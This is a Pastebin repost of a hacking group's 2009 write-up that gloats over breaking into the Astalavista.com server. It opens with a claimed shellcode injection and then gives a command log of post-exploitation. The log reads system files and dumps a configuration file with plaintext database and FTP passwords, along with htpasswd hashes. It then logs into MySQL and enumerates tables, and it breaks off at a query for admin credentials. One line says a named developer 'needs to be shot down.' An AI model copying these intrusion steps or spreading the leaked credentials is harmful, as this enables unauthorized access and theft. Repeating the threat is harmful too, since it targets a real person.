API tools faq
paste
Guest User

Untitled

a guest
Feb 9th, 2012
2,318
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 65.39 KB | None | 0 0
raw download clone embed print report
  1. / _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \
  2. / /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \
  3. / | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \
  4. \____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /
  5. \/ \/ \/ \/ \/ \/ \/
  6. The Hacking & Security Community
  7. [+] Founded in 1997 by a hacker computer enthusiast
  8. [-] Exposed in 2009 by anti-sec group
  9.  
  10. From < http://astalavista.com/faq>:
  11. >> 03. Who's behind the site?
  12. >>
  13. >> A team of security and IT professionals, and a countless number of contributors from all over the world.
  14.  
  15. >> 05. Is it true that the site is visited by script-kiddies and warez fans only?
  16. >>
  17. >> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
  18. military institutions.
  19. >> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.
  20.  
  21. Why has Astalavista been targeted?
  22.  
  23. Other than the fact that they are not doing any of this for the "community" but
  24. for the money, they spread exploits for kids, claim to be a security community
  25. (with no real sense of security on their own servers), and they charge you $6.66
  26. per months to access a dead forum with a directory filled with public releases
  27. and outdated / broken services.
  28.  
  29. We wanted to see how good that "team of security and IT professionals" really is.
  30.  
  31. Let's begin.
  32.  
  33. anti-sec:~# ./g0tshell astalavista.com -p 80
  34. [+] Connecting to astalavista.com:80
  35. [+] Grabbing banner...
  36. LiteSpeed
  37. [+] Injecting shellcode...
  38. [-] Wait for it
  39.  
  40. [~] We g0tshell
  41. uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
  42. ID: uid=100(apache) gid=500(apache) groups=500(apache)
  43.  
  44. sh-3.2$ cat /etc/passwd
  45. root:x:0:0:root:/root:/bin/bash
  46. bin:x:1:1:bin:/bin:/sbin/nologin
  47. daemon:x:2:2:daemon:/sbin:/sbin/nologin
  48. adm:x:3:4:adm:/var/adm:/sbin/nologin
  49. lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
  50. sync:x:5:0:sync:/sbin:/bin/sync
  51. shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
  52. halt:x:7:0:halt:/sbin:/sbin/halt
  53. mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
  54. news:x:9:13:news:/etc/news:
  55. uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
  56. operator:x:11:0:operator:/root:/sbin/nologin
  57. games:x:12:100:games:/usr/games:/sbin/nologin
  58. gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
  59. ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
  60. nobody:x:99:99:Nobody:/:/sbin/nologin
  61. rpm:x:37:37::/var/lib/rpm:/sbin/nologin
  62. dbus:x:81:81:System message bus:/:/sbin/nologin
  63. nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
  64. mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
  65. smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
  66. vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
  67. haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
  68. rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
  69. rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
  70. nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
  71. sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
  72. pcap:x:77:77::/var/arpwatch:/sbin/nologin
  73. named:x:25:25:Named:/var/named:/sbin/nologin
  74. apache:x:100:500::/var/www:/bin/false
  75. diradmin:x:101:101::/usr/local/directadmin:/bin/bash
  76. mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
  77. webapps:x:500:501::/var/www/html:/bin/bash
  78. majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
  79. admin:x:501:502::/home/admin:/bin/bash
  80. jon:x:502:503::/home/jon:/bin/bash
  81. com:x:503:504::/home/com:/bin/bash
  82. ntp:x:38:38::/etc/ntp:/sbin/nologin
  83. ais:x:39:39:openais Standards Based Cluster Framework:/:/sbin/nologin
  84. astanet:x:504:505::/home/astanet:/bin/bash
  85. avahi:x:70:70:Avahi daemon:/:/sbin/nologin
  86. avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
  87.  
  88. sh-3.2$ cat /etc/hosts
  89. # Do not remove the following line, or various programs
  90. # that require network functionality will fail.
  91. 127.0.0.1 localhost.localdomain localhost
  92. ::1 localhost6.localdomain6 localhost6
  93. 80.74.154.172 asta1.astalavistaserver.com
  94.  
  95. sh-3.2$ pwd
  96. /home/com/public_html
  97.  
  98. sh-3.2$ ls -la
  99. total 18460
  100. drwxr-xr-x 30 com apache 4096 May 28 17:06 .
  101. drwx--x--x 11 com com 4096 Jun 25 2008 ..
  102. drwxr-xr-x 2 com com 4096 Feb 2 19:29 admin
  103. drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache
  104. drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin
  105. drwxrwxrwx 2 com com 4096 May 19 00:50 config
  106. drwxr-xr-x 2 com com 4096 Mar 20 11:05 core
  107. drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules
  108. drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing
  109. drwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo
  110. drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__
  111. -rw-r--r-- 1 com com 8035 May 19 14:26 directory_to_mediadir.php
  112. drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd
  113. drwxr-xr-x 3 com com 4096 Feb 2 19:29 editor
  114. -rw-r--r-- 1 com com 3750 Feb 27 16:12 favicon.ico
  115. drwxrwxrwx 2 com com 4096 Jun 4 08:00 feed
  116. -rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess
  117. -rw-r--r-- 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak
  118. -rw-r--r-- 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak
  119. drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool
  120. drwxrwxrwx 14 com com 4096 Feb 2 19:29 images
  121. -rw-r--r-- 1 com com 97496 Jun 2 13:01 index.php
  122. drwxr-xr-x 6 com com 4096 Feb 2 19:29 installer
  123. drwxr-xr-x 8 com com 4096 Feb 2 19:29 lang
  124. drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib
  125. drwxrwxrwx 12 com com 4096 Jun 2 07:47 media
  126. drwxr-xr-x 8 com com 4096 May 11 12:48 modifications
  127. drwxr-xr-x 34 com com 4096 May 28 16:30 modules
  128. drwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin
  129. drwxrwxr-x 22 com com 4096 May 28 17:06 _new
  130. drwxr-xr-x 26 com com 4096 Feb 2 19:27 _old
  131. drwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy
  132. drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy
  133. -rw-r--r-- 1 com com 26 Feb 2 19:33 robots.txt
  134. -rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml
  135. -rw-r--r-- 1 com com 223 Mar 30 15:32 test.php
  136. drwxrwxrwx 8 com com 4096 Mar 6 13:15 themes
  137. drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp
  138. drwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam
  139.  
  140. sh-3.2$ head -20 index.php
  141. <?php
  142.  
  143. /**
  144. * The main page for the CMS
  145. * @copyright CONTREXX CMS - COMVATION AG
  146. * @author Comvation Development Team
  147. * @version v1.0.9.10.1 stable
  148. * @package contrexx
  149. * @subpackage core
  150. * @link http://www.contrexx.com/ contrexx homepage
  151. * @since v0.0.0.0
  152. * @todo Capitalize all class names in project
  153. * @uses /config/configuration.php
  154. * @uses /config/settings.php
  155. * @uses /config/version.php
  156. * @uses /core/API.php
  157. * @uses /core_modules/cache/index.class.php
  158. * @uses /core/error.class.php
  159. * @uses /core_modules/banner/index.class.php
  160. * @uses /core_modules/contact/index.class.php
  161.  
  162. sh-3.2$ cd config/
  163. sh-3.2$ ls -la
  164. total 32
  165. drwxrwxrwx 2 com com 4096 May 19 00:50 .
  166. drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
  167. -rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php
  168. -rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php
  169. -rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php
  170. -rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php
  171.  
  172. sh-3.2$ cat configuration.php
  173. [snip]
  174. $_DBCONFIG['host'] = 'localhost'; // This is normally set to localhost
  175. $_DBCONFIG['database'] = 'com_contrexx2_live'; // Database name
  176. $_DBCONFIG['tablePrefix'] = 'contrexx_'; // Database table prefix
  177. $_DBCONFIG['user'] = 'contrexxuser2'; // Database username
  178. $_DBCONFIG['password'] = '0fEYNZgXz1pKe'; // Database password
  179. $_DBCONFIG['dbType'] = 'mysql'; // Database type (e.g. mysql,postgres ..)
  180. $_DBCONFIG['charset'] = 'utf8'; // Charset (default, latin1, utf8, ..)
  181. [snip]
  182. $_FTPCONFIG['is_activated'] = true; // Ftp support true or false
  183. $_FTPCONFIG['use_passive'] = true; // Use passive ftp mode
  184. $_FTPCONFIG['host'] = 'localhost';// This is normally set to localhost
  185. $_FTPCONFIG['port'] = 21; // Ftp remote port
  186. $_FTPCONFIG['username'] = 'dev@astalavista.com'; // Ftp login username
  187. $_FTPCONFIG['password'] = 'jajklop0Iuj'; // Ftp login password
  188. $_FTPCONFIG['path'] = '/'; // Ftp path to cms
  189.  
  190. sh-3.2$ cd ..
  191. sh-3.2$ cd dvd/
  192. sh-3.2$ ls -la
  193. total 2913780
  194. drwxr-xr-x 2 com com 4096 Sep 9 2008 .
  195. drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
  196. -rw-r--r-- 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar
  197. -rw-r--r-- 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar
  198. -rw-r--r-- 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar
  199. -rw-r--r-- 1 com com 115 Jan 29 2008 .htaccess
  200.  
  201. sh-3.2$ cat .htaccess
  202. authType Basic
  203. authName DVD
  204. authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
  205. require valid-user
  206.  
  207. sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
  208. DVDdownload:CRD8cuY6.MPT6
  209. DVDdownload2:CR8a36.wluFMg
  210.  
  211. sh-3.2$ cat test.php
  212. <?php
  213. $url = 'aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D';
  214. $url = str_replace(array('&amp;', '&#38;'), '&', base64_decode(rawurldecode($url)));
  215. echo $url;
  216. ?>
  217.  
  218. sh-3.2$ cd modifications/
  219. sh-3.2$ ls -la
  220. total 32
  221. drwxr-xr-x 8 com com 4096 May 11 12:48 .
  222. drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
  223. drwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng
  224. drwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs
  225. drwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools
  226. drwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc
  227. drwxr-xr-x 2 com com 4096 Feb 2 19:33 search
  228. drwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp
  229.  
  230. sh-3.2$ ls -R
  231. .:
  232. com_avtng cronjobs onlinetools pjirc search _tmp
  233.  
  234. ./com_avtng:
  235. avtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts
  236.  
  237. ./com_avtng/scripts:
  238. popunder.js
  239.  
  240. ./cronjobs:
  241. exploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp
  242.  
  243. ./cronjobs/tmp:
  244. contrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv
  245.  
  246. ./onlinetools:
  247. index.php
  248.  
  249. ./pjirc:
  250. a_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt
  251. AppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt
  252. background.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd
  253.  
  254. ./pjirc/img:
  255. ange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif
  256. arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif
  257. verre-eau.gif
  258. argh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif
  259. verre-vin.gif
  260. ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif
  261. biere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif
  262.  
  263. ./pjirc/snd:
  264. bell2.au ding.au
  265.  
  266. ./search:
  267. searchEngines.php search.php
  268.  
  269. ./_tmp:
  270. defaultPorts.php defaultPorts.txt
  271.  
  272. sh-3.2$ cd cronjobs/
  273. sh-3.2$ cat exploits.php
  274. [snip]
  275. $categories = array();
  276. $milw0rmFile = FULLPATH . '/modifications/cronjobs/tmp/milw0rm/sploitlist.txt';
  277. $expolits = file($milw0rmFile);
  278. $comExploits = array();
  279. [snip]
  280. // manage data
  281. for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640
  282.  
  283. // get path and title
  284. $expolits[$x] = trim($expolits[$x]);
  285. $path = str_replace('./', FULLPATH . '/modifications/cronjobs/tmp/milw0rm/', substr($expolits[$x], 0, strpos($expolits[$x], ' ')));
  286. $title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ' ') + 1, strlen($expolits[$x])), ENT_QUOTES);
  287.  
  288. // check if file exists
  289. if (file_exists($path)) {
  290.  
  291. $text = file_get_contents($path);
  292.  
  293. // get content and date
  294. //$text = htmlspecialchars($text, ENT_QUOTES);
  295. $tmptext = addslashes(htmlentities($text, ENT_QUOTES, "UTF-8"));
  296. if ($tmptext != '') {
  297. $text = $tmptext;
  298. } else {
  299. $text = addslashes(htmlentities($text, ENT_QUOTES));
  300. }
  301. $date = str_replace('milw0rm.com [', '', str_replace(']', '', strstr($text, 'milw0rm.com [')));
  302. $tmp = explode('-', $date);
  303. $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
  304. $cat = getCategory ($path);
  305. $ext = pathinfo(basename($path));
  306. $ext = $ext['extension'];
  307. $qStr = "
  308. SELECT `id`
  309. FROM `contrexx_module_exploits`
  310. WHERE `title` = '" . $title . "'
  311. AND `date` = '" . $date . "'
  312. ";
  313. echo $x + 1 . ' von ' . count($expolits) . ' -> ' . $qStr . "\n";
  314. $q = $_objDB->query($qStr);
  315.  
  316. if ($q->numRows() == 0) {
  317.  
  318. // prepare array
  319. $comExploits[$x]['date'] = $date;
  320. $comExploits[$x]['title'] = $title;
  321. $comExploits[$x]['author'] = 'milw0rm';
  322. $comExploits[$x]['text'] = $text;
  323. $comExploits[$x]['source'] = $ext;
  324. $comExploits[$x]['url1'] = '';
  325. $comExploits[$x]['url2'] = '';
  326. $comExploits[$x]['catid'] = $cat;
  327. $comExploits[$x]['lang'] = '2';
  328. $comExploits[$x]['userid'] = '12';
  329. $comExploits[$x]['startdate'] = '0000-00-00';
  330. $comExploits[$x]['enddate'] = '0000-00-00';
  331. $comExploits[$x]['status'] = '1';
  332. $comExploits[$x]['changelog'] = $date;
  333.  
  334. }
  335. [snip]
  336. $xml = '<?xml version="1.0" encoding="UTF-8"?>
  337. <rss version="2.0">
  338. <channel>
  339. <title>ASTALAVISTA.com - Exploits</title>
  340. <link>http://www.astalavista.com/exploits</link>
  341. <description>All availably Exploits.</description>
  342. <language>en-us</language>
  343. <lastBuildDate>' . date('F, j M Y H:i:s O') . '</lastBuildDate>
  344. <docs>http://blogs.law.harvard.edu/tech/rss</docs>
  345. <generator>Astalavista.com</generator>
  346. <webMaster>info@astalavista.com</webMaster>' . $items . '
  347. </channel>
  348.  
  349. </rss>';
  350.  
  351.  
  352. if (file_exists(FULLPATH . '/feed/exploits.xml')) {
  353. unlink (FULLPATH . '/feed/exploits.xml');
  354. }
  355.  
  356.  
  357. file_put_contents(FULLPATH . '/feed/exploits.xml', $xml);
  358. [snip]
  359.  
  360. sh-3.2$ cat exploits.sh
  361. #!/bin/sh
  362.  
  363. ###########################################################
  364. # #
  365. # Title: milw0rm exploits adder #
  366. # Description: Add all milw0rm exploits to the #
  367. # Astalavista.com database #
  368. # #
  369. # Company: Astalavista Group #
  370. # Author: Paulo M. Santos #
  371. # E-Mail: paulo.santos@astalavista.ch #
  372. # #
  373. ###########################################################
  374.  
  375.  
  376. # path
  377. this_path=/home/com/public_html/modifications/cronjobs
  378.  
  379. # change directory
  380. cd $this_path
  381. cd tmp/
  382.  
  383. # delete files
  384. rm -rf milw0rm.tar.* &
  385. rm -rf milw0rm/ &
  386.  
  387. # wget milw0rm paket
  388. wget http://www.milw0rm.com/sploits/milw0rm.tar.bz2
  389.  
  390. # extract milw0rm paket
  391. tar -xvf milw0rm.tar.bz2
  392.  
  393. # change owner
  394. chown -R com .
  395. chgrp -R com .
  396.  
  397. # execute php script
  398. cd $this_path
  399. php -q exploits.php
  400.  
  401. # delete files
  402. rm -rf tmp/milw0rm.tar.*
  403. rm -rf tmp/milw0rm/
  404.  
  405. sh-3.2$ echo "Paulo M. Santos needs to be shot down."
  406. Paulo M. Santos needs to be shot down.
  407.  
  408. mysql -u contrexxuser2 -p
  409. Enter password:
  410. Welcome to the MySQL monitor. Commands end with ; or \g.
  411. Your MySQL connection id is 261694
  412. Server version: 5.0.45-community-log MySQL Community Edition (GPL)
  413.  
  414. Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
  415.  
  416. mysql> show databases;
  417. +--------------------+
  418. | Database |
  419. +--------------------+
  420. | information_schema |
  421. | com_contrexx2 |
  422. | com_contrexx2_live |
  423. | test |
  424. +--------------------+
  425. 4 rows in set (0.00 sec)
  426.  
  427. mysql> use com_contrexx2_live
  428. Database changed
  429. mysql> show tables;
  430. +--------------------------------------------------+
  431. | Tables_in_com_contrexx2_live |
  432. +--------------------------------------------------+
  433. | cc_banner_counter |
  434. | cc_search_counter |
  435. | contrexx_access_group_dynamic_ids |
  436. | contrexx_access_group_static_ids |
  437. | contrexx_access_rel_user_group |
  438. | contrexx_access_settings |
  439. | contrexx_access_user_attribute |
  440. | contrexx_access_user_attribute_name |
  441. | contrexx_access_user_attribute_value |
  442. | contrexx_access_user_core_attribute |
  443. | contrexx_access_user_groups |
  444. | contrexx_access_user_mail |
  445. | contrexx_access_user_profile |
  446. | contrexx_access_user_title |
  447. | contrexx_access_user_validity |
  448. | contrexx_access_users |
  449. | contrexx_backend_areas |
  450. | contrexx_backups |
  451. | contrexx_content |
  452. | contrexx_content_history |
  453. | contrexx_content_logfile |
  454. | contrexx_content_navigation |
  455. | contrexx_content_navigation_history |
  456. | contrexx_ids |
  457. | contrexx_languages |
  458. | contrexx_lib_country |
  459. | contrexx_log |
  460. | contrexx_module_alias_source |
  461. | contrexx_module_alias_target |
  462. | contrexx_module_block_blocks |
  463. | contrexx_module_block_rel_lang |
  464. | contrexx_module_block_rel_pages |
  465. | contrexx_module_block_settings |
  466. | contrexx_module_blog_categories |
  467. | contrexx_module_blog_comments |
  468. | contrexx_module_blog_message_to_category |
  469. | contrexx_module_blog_messages |
  470. | contrexx_module_blog_messages_lang |
  471. | contrexx_module_blog_networks |
  472. | contrexx_module_blog_networks_lang |
  473. | contrexx_module_blog_settings |
  474. | contrexx_module_blog_votes |
  475. | contrexx_module_calendar |
  476. | contrexx_module_calendar_access |
  477. | contrexx_module_calendar_categories |
  478. | contrexx_module_calendar_form_data |
  479. | contrexx_module_calendar_form_fields |
  480. | contrexx_module_calendar_registrations |
  481. | contrexx_module_calendar_settings |
  482. | contrexx_module_calendar_style |
  483. | contrexx_module_contact_form |
  484. | contrexx_module_contact_form_data |
  485. | contrexx_module_contact_form_field |
  486. | contrexx_module_contact_settings |
  487. | contrexx_module_data_categories |
  488. | contrexx_module_data_message_to_category |
  489. | contrexx_module_data_messages |
  490. | contrexx_module_data_messages_lang |
  491. | contrexx_module_data_placeholders |
  492. | contrexx_module_data_settings |
  493. | contrexx_module_directory_access |
  494. | contrexx_module_directory_categories |
  495. | contrexx_module_directory_dir |
  496. | contrexx_module_directory_inputfields |
  497. | contrexx_module_directory_levels |
  498. | contrexx_module_directory_mail |
  499. | contrexx_module_directory_rel_dir_cat |
  500. | contrexx_module_directory_rel_dir_level |
  501. | contrexx_module_directory_settings |
  502. | contrexx_module_directory_settings_google |
  503. | contrexx_module_directory_vote |
  504. | contrexx_module_docsys |
  505. | contrexx_module_docsys_categories |
  506. | contrexx_module_egov_configuration |
  507. | contrexx_module_egov_orders |
  508. | contrexx_module_egov_product_calendar |
  509. | contrexx_module_egov_product_fields |
  510. | contrexx_module_egov_products |
  511. | contrexx_module_egov_settings |
  512. | contrexx_module_exploits |
  513. | contrexx_module_exploits_categories |
  514. | contrexx_module_feed_category |
  515. | contrexx_module_feed_news |
  516. | contrexx_module_feed_newsml_association |
  517. | contrexx_module_feed_newsml_categories |
  518. | contrexx_module_feed_newsml_documents |
  519. | contrexx_module_feed_newsml_providers |
  520. | contrexx_module_forum_access |
  521. | contrexx_module_forum_categories |
  522. | contrexx_module_forum_categories_lang |
  523. | contrexx_module_forum_notification |
  524. | contrexx_module_forum_postings |
  525. | contrexx_module_forum_rating |
  526. | contrexx_module_forum_settings |
  527. | contrexx_module_forum_statistics |
  528. | contrexx_module_gallery_categories |
  529. | contrexx_module_gallery_comments |
  530. | contrexx_module_gallery_language |
  531. | contrexx_module_gallery_language_pics |
  532. | contrexx_module_gallery_pictures |
  533. | contrexx_module_gallery_settings |
  534. | contrexx_module_gallery_votes |
  535. | contrexx_module_guestbook |
  536. | contrexx_module_guestbook_settings |
  537. | contrexx_module_livecam |
  538. | contrexx_module_livecam_settings |
  539. | contrexx_module_market |
  540. | contrexx_module_market_access |
  541. | contrexx_module_market_categories |
  542. | contrexx_module_market_mail |
  543. | contrexx_module_market_paypal |
  544. | contrexx_module_market_settings |
  545. | contrexx_module_market_spez_fields |
  546. | contrexx_module_mediadir_access |
  547. | contrexx_module_mediadir_categories |
  548. | contrexx_module_mediadir_comments |
  549. | contrexx_module_mediadir_dir |
  550. | contrexx_module_mediadir_inputfields |
  551. | contrexx_module_mediadir_levels |
  552. | contrexx_module_mediadir_mail |
  553. | contrexx_module_mediadir_rel_dir_cat |
  554. | contrexx_module_mediadir_rel_dir_level |
  555. | contrexx_module_mediadir_reports |
  556. | contrexx_module_mediadir_settings |
  557. | contrexx_module_mediadir_settings_google |
  558. | contrexx_module_mediadir_vote |
  559. | contrexx_module_memberdir_directories |
  560. | contrexx_module_memberdir_name |
  561. | contrexx_module_memberdir_settings |
  562. | contrexx_module_memberdir_values |
  563. | contrexx_module_nettools_allowed_groups |
  564. | contrexx_module_nettools_settings |
  565. | contrexx_module_news |
  566. | contrexx_module_news_access |
  567. | contrexx_module_news_categories |
  568. | contrexx_module_news_settings |
  569. | contrexx_module_news_teaser_frame |
  570. | contrexx_module_news_teaser_frame_templates |
  571. | contrexx_module_news_ticker |
  572. | contrexx_module_newsletter |
  573. | contrexx_module_newsletter_attachment |
  574. | contrexx_module_newsletter_category |
  575. | contrexx_module_newsletter_confirm_mail |
  576. | contrexx_module_newsletter_rel_cat_news |
  577. | contrexx_module_newsletter_rel_user_cat |
  578. | contrexx_module_newsletter_settings |
  579. | contrexx_module_newsletter_template |
  580. | contrexx_module_newsletter_tmp_sending |
  581. | contrexx_module_newsletter_user |
  582. | contrexx_module_newsletter_user_title |
  583. | contrexx_module_onlinetools_defaultports |
  584. | contrexx_module_onlinetools_defaultports_back |
  585. | contrexx_module_onlinetools_geolitecity_blocks |
  586. | contrexx_module_onlinetools_geolitecity_country |
  587. | contrexx_module_onlinetools_geolitecity_location |
  588. | contrexx_module_podcast_category |
  589. | contrexx_module_podcast_medium |
  590. | contrexx_module_podcast_rel_category_lang |
  591. | contrexx_module_podcast_rel_medium_category |
  592. | contrexx_module_podcast_settings |
  593. | contrexx_module_podcast_template |
  594. | contrexx_module_proxydb |
  595. | contrexx_module_recommend |
  596. | contrexx_module_repository |
  597. | contrexx_module_securitynews_cats |
  598. | contrexx_module_securitynews_feeds |
  599. | contrexx_module_securitynews_news |
  600. | contrexx_module_shop_categories |
  601. | contrexx_module_shop_config |
  602. | contrexx_module_shop_countries |
  603. | contrexx_module_shop_currencies |
  604. | contrexx_module_shop_customers |
  605. | contrexx_module_shop_importimg |
  606. | contrexx_module_shop_lsv |
  607. | contrexx_module_shop_mail |
  608. | contrexx_module_shop_mail_content |
  609. | contrexx_module_shop_manufacturer |
  610. | contrexx_module_shop_order_items |
  611. | contrexx_module_shop_order_items_attributes |
  612. | contrexx_module_shop_orders |
  613. | contrexx_module_shop_payment |
  614. | contrexx_module_shop_payment_processors |
  615. | contrexx_module_shop_pricelists |
  616. | contrexx_module_shop_products |
  617. | contrexx_module_shop_products_attributes |
  618. | contrexx_module_shop_products_attributes_name |
  619. | contrexx_module_shop_products_attributes_value |
  620. | contrexx_module_shop_products_downloads |
  621. | contrexx_module_shop_rel_countries |
  622. | contrexx_module_shop_rel_payment |
  623. | contrexx_module_shop_rel_shipment |
  624. | contrexx_module_shop_shipment_cost |
  625. | contrexx_module_shop_shipper |
  626. | contrexx_module_shop_vat |
  627. | contrexx_module_shop_zones |
  628. | contrexx_module_u2u_address_list |
  629. | contrexx_module_u2u_message_log |
  630. | contrexx_module_u2u_sent_messages |
  631. | contrexx_module_u2u_settings |
  632. | contrexx_module_u2u_user_log |
  633. | contrexx_modules |
  634. | contrexx_sessions |
  635. | contrexx_settings |
  636. | contrexx_settings_smtp |
  637. | contrexx_skins |
  638. | contrexx_stats_browser |
  639. | contrexx_stats_colourdepth |
  640. | contrexx_stats_config |
  641. | contrexx_stats_country |
  642. | contrexx_stats_hostname |
  643. | contrexx_stats_javascript |
  644. | contrexx_stats_operatingsystem |
  645. | contrexx_stats_referer |
  646. | contrexx_stats_requests |
  647. | contrexx_stats_requests_summary |
  648. | contrexx_stats_screenresolution |
  649. | contrexx_stats_search |
  650. | contrexx_stats_spiders |
  651. | contrexx_stats_spiders_summary |
  652. | contrexx_stats_visitors |
  653. | contrexx_stats_visitors_summary |
  654. | contrexx_voting_additionaldata |
  655. | contrexx_voting_email |
  656. | contrexx_voting_rel_email_system |
  657. | contrexx_voting_results |
  658. | contrexx_voting_system |
  659. | foo |
  660. +--------------------------------------------------+
  661. 227 rows in set (0.01 sec)
  662.  
  663. mysql> select count(*) as skids from contrexx_access_users;
  664. +-------+
  665. | skids |
  666. +-------+
  667. | 53699 |
  668. +-------+
  669. 1 row in set (0.00 sec)
  670.  
  671. mysql> describe contrexx_access_users;
  672. +------------------+------------------------------------------+------+-----+--------------+----------------+
  673. | Field | Type | Null | Key | Default | Extra |
  674. +------------------+------------------------------------------+------+-----+--------------+----------------+
  675. | id | int(10) unsigned | NO | PRI | NULL | auto_increment |
  676. | is_admin | tinyint(1) unsigned | NO | | 0 | |
  677. | username | varchar(40) | YES | MUL | NULL | |
  678. | password | varchar(32) | YES | | NULL | |
  679. | regdate | int(14) unsigned | NO | | 0 | |
  680. | expiration | int(14) unsigned | NO | | 0 | |
  681. | validity | int(10) unsigned | NO | | 0 | |
  682. | last_auth | int(14) unsigned | NO | | 0 | |
  683. | last_activity | int(14) unsigned | NO | | 0 | |
  684. | email | varchar(255) | YES | | NULL | |
  685. | email_access | enum('everyone','members_only','nobody') | NO | | nobody | |
  686. | frontend_lang_id | int(2) unsigned | NO | | 0 | |
  687. | backend_lang_id | int(2) unsigned | NO | | 0 | |
  688. | active | tinyint(1) | NO | | 0 | |
  689. | profile_access | enum('everyone','members_only','nobody') | NO | | members_only | |
  690. | restore_key | varchar(32) | NO | | | |
  691. | restore_key_time | int(14) unsigned | NO | | 0 | |
  692. | u2u_active | enum('0','1') | NO | | 1 | |
  693. +------------------+------------------------------------------+------+-----+--------------+----------------+
  694. 18 rows in set (0.00 sec)
  695.  
  696. mysql> select username,password,email from contrexx_access_users where is_admin = 1;
  697. +------------+----------------------------------+-----------------------------+
  698. | username | password | email |
  699. +------------+----------------------------------+-----------------------------+
